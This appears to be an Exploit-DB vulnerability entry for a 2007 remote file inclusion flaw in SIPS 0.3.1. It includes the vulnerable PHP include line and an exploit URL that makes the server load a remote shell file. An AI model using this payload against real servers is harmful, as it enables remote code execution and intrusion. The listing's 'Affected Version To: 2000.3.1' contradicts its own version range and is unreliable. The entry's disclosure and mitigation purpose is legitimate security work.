header-logo
Suggest Exploit
vendor:
SIPS
by:
ajann
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: SIPS
Affected Version From: 0.3.1 and earlier
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability

The SIPS version 0.3.1 and earlier is vulnerable to remote file inclusion. The 'box.inc.php' file does not properly validate user input, which allows an attacker to include remote files and execute arbitrary code.

Mitigation:

Update to the latest version of SIPS to fix the vulnerability. Disable remote file inclusion in the server configuration.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://sourceforge.net/projects/sips/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $config["sipssys"] ."/code/rssparser.inc.php";
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]

Example:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-02-01]